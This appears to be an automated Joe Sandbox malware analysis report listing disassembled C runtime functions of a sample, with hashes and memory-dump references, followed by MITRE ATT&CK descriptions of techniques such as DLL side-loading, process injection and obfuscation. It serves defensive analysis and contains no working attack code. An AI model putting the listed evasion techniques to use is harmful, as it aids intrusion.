Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: __acrt_iob_func
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 711238415-3474627141
Opcode ID: 07b72be768c9fcacdeb0d98bda45982e8566b82515d163f0a7091b43d3986cf5
Instruction ID: 8eb65a5a6346f3d11731344b253acd3344e838f28c0eedfc9bb60340fcd9e167
Opcode Fuzzy Hash: 07b72be768c9fcacdeb0d98bda45982e8566b82515d163f0a7091b43d3986cf5
Instruction Fuzzy Hash: 4C213826A04F849AE7119F68D8413EAB775FB59798F844622EE8C17724EF38D259C700

Function 00007FF72A0609B0 Relevance: 5.3, APIs: 4, Instructions: 299stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,?,00000000,?,?,?,00007FF729FE2958), ref: 00007FF72A060A18

Part of subcall function 00007FF729FC5010: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF72A03870F), ref: 00007FF729FC5045

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,?,00000000,?,?,?,00007FF729FE2958), ref: 00007FF72A060A9F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,?,00000000,?,?,?,00007FF729FE2958), ref: 00007FF72A060B21
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,?,00000000,?,?,?,00007FF729FE2958), ref: 00007FF72A060BA3

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: strlen$memcpy
String ID:
API String ID: 3396830738-0
Opcode ID: ec0177ab2c3040dcfadabe45140983ed302ed83747fde42a82098cf6649354b6
Instruction ID: 9988594e80389d131f821bc893b842c3b87c1236e530a8ba73f3016ffcbd5cdb
Opcode Fuzzy Hash: ec0177ab2c3040dcfadabe45140983ed302ed83747fde42a82098cf6649354b6
Instruction Fuzzy Hash: B9D1B162708B0781EB60EF1AE84056DA371FB85FD8B948676DE5E47795EE3CE140CB20

Function 00007FF72A061140 Relevance: 5.3, APIs: 4, Instructions: 299stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,?,00000000,?,?,?,00007FF729FE3BE8), ref: 00007FF72A0611A8

Part of subcall function 00007FF729FC5010: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF72A03870F), ref: 00007FF729FC5045

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,?,00000000,?,?,?,00007FF729FE3BE8), ref: 00007FF72A06122F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,?,00000000,?,?,?,00007FF729FE3BE8), ref: 00007FF72A0612B1
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,?,?,00000000,?,?,?,00007FF729FE3BE8), ref: 00007FF72A061333

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: strlen$memcpy
String ID:
API String ID: 3396830738-0
Opcode ID: 386ca3e97bc97830876448f36d3f02c93e1fa50d53d2af7be61a808401e4b891
Instruction ID: 975f5fe8d1c4ed6f75f128508554edd8ad9c9b31853523c68d46a00788f2260c
Opcode Fuzzy Hash: 386ca3e97bc97830876448f36d3f02c93e1fa50d53d2af7be61a808401e4b891
Instruction Fuzzy Hash: ECD1D162B08B0381EB60EF1AE84026DA371FB85FD4B844536EE5E47795EE3CD544CB20

Function 00007FF729F8C13C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF729F8C1BF

Part of subcall function 00007FF729F97F40: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00007FF729F9BB23), ref: 00007FF729F97F82

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF729F8C1E4
Argument domain error (DOMAIN), xrefs: 00007FF729F8C13C

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: __acrt_iob_func__stdio_common_vfprintf
String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 2168557111-2713391170
Opcode ID: 68f9f64199a9c06ca52ecc87fa6df189c933ab3708449a808d520ec22cc466d6
Instruction ID: cefcf03638ca037b4a5146165802ab156d0c49ac59a20861f4365f191890f18c
Opcode Fuzzy Hash: 68f9f64199a9c06ca52ecc87fa6df189c933ab3708449a808d520ec22cc466d6
Instruction Fuzzy Hash: 0F017C27A04F888AE7119F69D8402AAB770FF4D798F444762EF8D27728DF28C244C710

Function 00007FF729F8C156 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF729F8C1BF

Part of subcall function 00007FF729F97F40: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00007FF729F9BB23), ref: 00007FF729F97F82

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF729F8C1E4
Overflow range error (OVERFLOW), xrefs: 00007FF729F8C156

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: __acrt_iob_func__stdio_common_vfprintf
String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 2168557111-4064033741
Opcode ID: 0847bcc77b85e37276453c8a292708eb9d10d550879459940c25855d04d36c4d
Instruction ID: 463c816e94f6b4361f8053e62cffa1f8543c9704066ea1279a2b5b745e91588b
Opcode Fuzzy Hash: 0847bcc77b85e37276453c8a292708eb9d10d550879459940c25855d04d36c4d
Instruction Fuzzy Hash: DC017C27A04F888AE7119F69D8402AAB770FF4D798F444762EF8D27728DF28C244C710

Function 00007FF729F8C149 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF729F8C1BF

Part of subcall function 00007FF729F97F40: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00007FF729F9BB23), ref: 00007FF729F97F82

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF729F8C1E4
Argument singularity (SIGN), xrefs: 00007FF729F8C149

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: __acrt_iob_func__stdio_common_vfprintf
String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 2168557111-2468659920
Opcode ID: 1740f074df9d0d3d0e48809e41b4479b67cd767e6609c8189211d6f6ae1918b8
Instruction ID: c310ac593b0ef9241783ab78b1ce42f737067bfb3950bcf4f79edb003ae1b99f
Opcode Fuzzy Hash: 1740f074df9d0d3d0e48809e41b4479b67cd767e6609c8189211d6f6ae1918b8
Instruction Fuzzy Hash: DF015A27A04F888AE7119F69D8402AAB770FB4D798F444762EF8D27724DF28C2448710

Function 00007FF729F8C163 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF729F8C1BF

Part of subcall function 00007FF729F97F40: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00007FF729F9BB23), ref: 00007FF729F97F82

Strings

Partial loss of significance (PLOSS), xrefs: 00007FF729F8C163
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF729F8C1E4

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: __acrt_iob_func__stdio_common_vfprintf
String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 2168557111-4283191376
Opcode ID: d9291ac94731095ccd7fd4078ca5c5070364b4ce9a3dd10b6f3e46fabbf30855
Instruction ID: 8913926a25857eaee324e52fc1b82a1d00da268dfd0b334edcfb07789c01f25d
Opcode Fuzzy Hash: d9291ac94731095ccd7fd4078ca5c5070364b4ce9a3dd10b6f3e46fabbf30855
Instruction Fuzzy Hash: EA017C27A04F888AE7119F69D8402AAB770FF4D798F444762EF8D27768DF28C245C710

Function 00007FF729F8C170 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF729F8C1BF

Part of subcall function 00007FF729F97F40: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00007FF729F9BB23), ref: 00007FF729F97F82

Strings

Total loss of significance (TLOSS), xrefs: 00007FF729F8C170
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF729F8C1E4

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: __acrt_iob_func__stdio_common_vfprintf
String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 2168557111-4273532761
Opcode ID: 5574e596bd3942e983f6ee61704480de15341cfff0dde46b47e35dfb0dac427e
Instruction ID: 5ab3037744e29d9e8ef3ef1c76a12dc7faf3fe3e98b6cbe08954bb3eeca57d8a
Opcode Fuzzy Hash: 5574e596bd3942e983f6ee61704480de15341cfff0dde46b47e35dfb0dac427e
Instruction Fuzzy Hash: EF017C27A04F888AE7119F69D8402AAB770FF4DB98F444762EF8D27764DF28C244C710

Function 00007FF729F8C17D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF729F8C1BF

Part of subcall function 00007FF729F97F40: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00007FF729F9BB23), ref: 00007FF729F97F82

Strings

The result is too small to be represented (UNDERFLOW), xrefs: 00007FF729F8C17D
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF729F8C1E4

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: __acrt_iob_func__stdio_common_vfprintf
String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 2168557111-2187435201
Opcode ID: c2574aeb36ef17c9a0e6d4006631dfbb6740d3c79e5ea7aabe9d69f3db815317
Instruction ID: c8dab285ec2b25bb4407f7dcac65d0f11b19881a2dcb9568614544b29fba34c6
Opcode Fuzzy Hash: c2574aeb36ef17c9a0e6d4006631dfbb6740d3c79e5ea7aabe9d69f3db815317
Instruction Fuzzy Hash: B0015A27A04F888AE7119F69D8402AAB770FB4D798F444722EF8D27724DF28C2448710

Function 00007FF729FBFA60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27stringCOMMON

Download Yara Rule

APIs

strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF729FBFA6C
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729FBFA83

Strings

basic_string: construction from null is not valid, xrefs: 00007FF729FBFAA1

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: strerrorstrlen
String ID: basic_string: construction from null is not valid
API String ID: 960536887-2991274800
Opcode ID: eeea25a2197ebb507ed858424a0c9ac4f65a91984dfbfd7ea8fa2b2e367fcf22
Instruction ID: b9d3832545fd2f6ffbe6cdfe40a7d0f84580b8da1ad28584f7d270934e2930c0
Opcode Fuzzy Hash: eeea25a2197ebb507ed858424a0c9ac4f65a91984dfbfd7ea8fa2b2e367fcf22
Instruction Fuzzy Hash: 91E0ED11F5AA2241FB1A7F16AC100F99260DF8AB90EC81031DC0C1B382EC2CEA478B20

Function 00007FF729F9F14E Relevance: 5.1, APIs: 4, Instructions: 91COMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF729F9F184

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: calloc
String ID:
API String ID: 2635317215-0
Opcode ID: b27d27018714eb4883b57ef67b618f4a757feb0d8eeedd0dea2792b69c175127
Instruction ID: 13da40f1ea6fe1a4e5082f0fcdd8687e99c11ac35fe574ee42360a94f18ca079
Opcode Fuzzy Hash: b27d27018714eb4883b57ef67b618f4a757feb0d8eeedd0dea2792b69c175127
Instruction Fuzzy Hash: 46410326F047059AFB44AFAAD8443AD77B0EB44B48F848075CE1C1BB99DE38DB809B50

Function 00007FF729F9B1AE Relevance: 5.1, APIs: 4, Instructions: 71COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF729F9B223
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF729F9B240
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF729F9B25D
memset.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729F9B274

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: free$memset
String ID:
API String ID: 2717317152-0
Opcode ID: dd240a26b788bc499e51edf1dbd0794f8fac90e42337e1d5944e3c7c1cdaba7f
Instruction ID: 8ea2644f3e26261fc44aac858b319ca1f454526334af118cbff039ae851c57d7
Opcode Fuzzy Hash: dd240a26b788bc499e51edf1dbd0794f8fac90e42337e1d5944e3c7c1cdaba7f
Instruction Fuzzy Hash: 6631EF25B05B4685FF55AF5AEC842AC63B0FB49F84F48487ADD1C07764DF38E2509720

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
